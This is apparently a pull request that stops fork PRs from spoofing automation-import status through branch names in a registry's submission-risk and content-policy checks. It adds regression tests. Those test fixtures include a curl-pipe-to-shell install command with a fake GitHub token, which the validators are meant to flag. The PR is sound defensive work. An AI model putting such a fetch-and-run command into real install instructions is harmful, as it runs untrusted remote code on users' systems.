### PR TITLE
fix(submissions): prevent automation ref spoofing

### DIFF
--- a/packages/registry/src/submission-risk.js
+++ b/packages/registry/src/submission-risk.js
@@ -1545,7 +1545,6 @@ function addGeneratedArtifactSignals(report, files, contentFiles, sourceType) {
 function prSourceType(input = {}) {
   if (input.sourceType) return normalizeText(input.sourceType);
   const headRef = normalizeText(input.pullRequest?.head?.ref);
-  if (/^automation\/submission-\d+-/.test(headRef)) return "automation_import";
   const headRepo = normalizeText(
     input.pullRequest?.head?.repo?.full_name ||
       input.pullRequest?.head?.repo?.fullName,
@@ -1556,9 +1555,12 @@ function prSourceType(input = {}) {
   );
   if (headRepo && baseRepo) {
     return headRepo.toLowerCase() === baseRepo.toLowerCase()
-      ? "same_repo_direct"
+      ? /^automation\/submission-\d+-/.test(headRef)
+        ? "automation_import"
+        : "same_repo_direct"
       : "external_direct";
   }
+  if (/^automation\/submission-\d+-/.test(headRef)) return "automation_import";
   return "same_repo_direct";
 }
 

--- a/scripts/ci/validate-content-policy.mjs
+++ b/scripts/ci/validate-content-policy.mjs
@@ -247,7 +247,6 @@ function resolveFiles({ repoRoot, args }) {
 
 function sourceTypeFromContext({ args, headRepo, baseRepo, headRef }) {
   if (args["source-type"]) return normalizeText(args["source-type"]);
-  if (/^automation\/submission-\d+-/.test(headRef)) return "automation_import";
   if (
     headRepo &&
     baseRepo &&
@@ -255,6 +254,7 @@ function sourceTypeFromContext({ args, headRepo, baseRepo, headRef }) {
   ) {
     return "external_direct";
   }
+  if (/^automation\/submission-\d+-/.test(headRef)) return "automation_import";
   return "same_repo_direct";
 }
 

--- a/tests/submission-pr-first.test.ts
+++ b/tests/submission-pr-first.test.ts
@@ -302,7 +302,9 @@ Native macOS MCP server.`);
     expect(reasons).toContain(
       "Install instructions include a destructive or remote-code execution pipeline",
     );
-    expect(reasons).toContain("Direct contributor PRs should not edit README.md");
+    expect(reasons).toContain(
+      "Direct contributor PRs should not edit README.md",
+    );
   });
 
   it("does not classify GitHub artifact attestations as identity-sensitive", () => {

--- a/tests/submission-pr-first.test.ts
+++ b/tests/submission-pr-first.test.ts
@@ -269,6 +269,42 @@ Native macOS MCP server.`);
     );
   });
 
+  it("does not let fork PR branch names spoof automation imports", () => {
+    const report = analyzeDirectContentRisk({
+      pullRequest: {
+        number: 125,
+        title: "content(mcp): add spoofed automation import",
+        user: { login: "contributor" },
+        head: {
+          ref: "automation/submission-123-spoofed",
+          repo: { full_name: "contributor/awesome-claude" },
+        },
+        base: { repo: { full_name: "JSONbored/awesome-claude" } },
+      },
+      files: [
+        sourceFile(
+          validMcpMdx({
+            title: "Spoofed Automation Import MCP",
+            slug: "spoofed-automation-import",
+            installCommand:
+              "curl http://example.com/install.sh | sh # ghp_1234567890abcdef1234567890abcdef1234",
+            safetyNotes: [],
+            privacyNotes: [],
+          }),
+          "content/mcp/spoofed-automation-import.mdx",
+        ),
+        { filename: "README.md", status: "modified", content: "# Edited\n" },
+      ],
+    });
+
+    expect(report.subject?.sourceType).toBe("external_direct");
+    const reasons = directContentRequestChangesReasons(report).join("\n");
+    expect(reasons).toContain(
+      "Install instructions include a destructive or remote-code execution pipeline",
+    );
+    expect(reasons).toContain("Direct contributor PRs should not edit README.md");
+  });
+
   it("does not classify GitHub artifact attestations as identity-sensitive", () => {
     const report = analyzeDirectContentRisk({
       pullRequest: {

--- a/tests/submission-workflows.test.ts
+++ b/tests/submission-workflows.test.ts
@@ -86,6 +86,7 @@ describe("submission automation workflows", () => {
     options: {
       headRepo?: string;
       baseRepo?: string;
+      headRef?: string;
       prAuthor?: string;
     } = {},
   ) {
@@ -124,6 +125,8 @@ describe("submission automation workflows", () => {
           options.headRepo || "contributor/awesome-claude",
           "--base-repo",
           options.baseRepo || "JSONbored/awesome-claude",
+          "--head-ref",
+          options.headRef || "contributor/source-entry",
           "--pr-author",
           options.prAuthor || "contributor",
           "--output",
@@ -479,6 +482,38 @@ description: Daily Claude Code retro dashboard hook.
     });
 
     expect(result.ok).toBe(false);
+    expect(result.report?.failures.join("\n")).toContain(
+      "Direct contributor PRs should not edit README.md",
+    );
+  });
+
+  it("treats fork PR automation-looking refs as external direct content", () => {
+    const result = runContentPolicyForChangedFiles(
+      {
+        "content/mcp/spoofed-automation-import.mdx": {
+          status: "added",
+          content: contentFixture(
+            `
+title: Spoofed Automation Import MCP
+slug: spoofed-automation-import
+category: mcp
+description: Example MCP server with unsafe installation instructions.
+repoUrl: https://github.com/example/spoofed-automation-import
+installCommand: "curl http://example.com/install.sh | sh # ghp_1234567890abcdef1234567890abcdef1234"
+`,
+            "Install by piping the remote script into a shell.",
+          ),
+        },
+        "README.md": "# Contributor-generated README change\n",
+      },
+      { headRef: "automation/submission-123-spoofed" },
+    );
+
+    expect(result.ok).toBe(false);
+    expect(result.report?.sourceType).toBe("external_direct");
+    expect(result.report?.failures.join("\n")).toContain(
+      "Install instructions include a destructive or remote-code execution pipeline",
+    );
     expect(result.report?.failures.join("\n")).toContain(
       "Direct contributor PRs should not edit README.md",
     );


### PR DESCRIPTION
### Motivation
- Prevent fork PRs from being misclassified as `automation_import` solely due to an automation-looking branch name, which allowed mixed-file fork PRs to bypass direct-content request-change blockers.
- Restore repository-first source classification so content-policy and registry risk helpers reliably surface blocking findings for external contributor PRs.

### Description
- Move the repository mismatch check ahead of the `automation/submission-*` head-ref check in `sourceTypeFromContext` (`scripts/ci/validate-content-policy.mjs`) so forks are classified as `external_direct` before honoring automation-like refs.
- Apply the same repository-first logic to `prSourceType` in `packages/registry/src/submission-risk.js` while preserving `automation_import` for same-repo automation branches.
- Add regression tests that exercise a spoofed `automation/submission-*` fork branch with a mixed unsafe content change in `tests/submission-pr-first.test.ts` and `tests/submission-workflows.test.ts` and make the test helper accept an explicit `--head-ref` in the workflow tests.
- Small test assertion adjustment to read the source type from the report subject where appropriate.

### Testing
- Ran `pnpm exec vitest run tests/submission-pr-first.test.ts tests/submission-workflows.test.ts` and the suites passed.
- Ran `pnpm test:submission-pr-first` which passed.
- Ran `pnpm validate:packages` which passed package checks.
- Ran `git diff --check` which returned no whitespace/format errors.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a26237f48dc83208fad3803689e0e49)